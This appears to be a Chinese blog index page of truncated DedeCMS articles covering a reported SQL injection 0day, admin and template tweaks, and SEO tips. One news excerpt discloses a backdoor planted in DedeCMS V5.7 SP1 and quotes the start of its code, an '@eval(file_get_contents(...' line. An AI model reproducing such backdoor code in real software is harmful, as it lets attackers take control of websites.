站长之家消息:国内安全研究团队“知道创宇”称截获到最新DEDECMS SQL注入0day,DEDECMS官网目前提供下载的最新版5.7也受影响,截止本告警发出时官方尚未给出补丁或解决方案,此漏洞利用简单且dedecms安装之后默认即开启漏洞模块。
知道创宇给出三种临时解决方案:
方案一、临时补丁,需要四步
1. 确保您的magic_quotes_gpc = On
详细开启方式:...
阅读全文
织梦dede系统的后台文件, 默认的排序很乱, 不是按名称, 也不是按时间, 如果目录内容很多的话, 很难找到自己想要的文件:
实在是太不方便了, 于是想让这些文件列表按名字排序, 看了一下后台的文件, 原来是因为php的函数dir引起的, 以”默认模板管理”在文件列表为例, 在后台的找到模板文件: /dede/templets/templets_default.ht...
阅读全文
DedeCMS发布文章时通常是发布即审核,dede每分钟审核一篇文章并生成首页的实现方法对于使用dedecms采集功能的网站更有利,感兴趣的朋友不仿试试!
首页在plus下新建文件 makeid.php 内容如下:
<?php
$lasttime=filemtime($_SERVER['DOCUMENT_ROOT'].”/index...
阅读全文
相信大家用Dede架构网站的有很多吧,很多时候我们是直接复制一个templets\default文件夹修改掉名字来达到修改模版路径的目的, 但是如果自己做的模板,往往很多地方考虑的不周到,因为不是所有功能都用得到。访问一些不存在模板的功能,有时候会暴露模板的真实路径。
1,批量修改模版文件
方法,使用批量修改工具。比如你模版目录是templets\xahot.net,那么你需要...
阅读全文
根据DedeCMS中的字段是否为空输出相应的内容,代码测试通过。不多说,直接看代码吧:
文章列表页代码:
{dede:field.array runphp='yes'}
if(@me['seotitle']==''){
@me=@me['title'];// 注意这个分号,不要忘记了
}else{
@me=@me['seotitle'];//...
阅读全文
去年年底,某客户找我帮忙制作了一个企业网站,考虑到网站日后要进行搜索引擎推广,因此,网站在SEO上必须具备搜索引擎友好性,权衡左右,最终我 选择了DeDeCMS,这样可以在URL、PageTitle、TextBlock、LinkBlock、Auto Sitemap、Related Article几方面及早进行SEO布局。于是,在栏目规划、布局设计、模板制作阶段,我便将各...
阅读全文
站长之家报道:昨日,乌云漏洞平台发布最新报告称,著名开源建站软件Dedecms V5.7 SP1正式版被植入后门,通过该后门可成功入侵并控制使用dedecms的网站。
Dedecms被曝植入后门(站长之家配图)
据乌云报告,被植入的后门是在/include/shopcar.class.php文件中,被植入的代码为 @eval(file_get_contents(‘php:/...
阅读全文
今天我们接着码织梦的教程,大家做SEO的都知道网站首页的更新频率直接决定了网站的收录速度和一部分站点权重,但是我们不能实时的去更新,在这个科技如此发达的时代如果我们还在采用最原始的办法那一定是个悲剧。没错,就像标题写的一样,自动,没错就是自动,全自动更新首页的文章列表。
第一步调用随机文章:
织梦给出了随机文章调用的参数如下:
{dede:arclist sort=&rsquo...
阅读全文
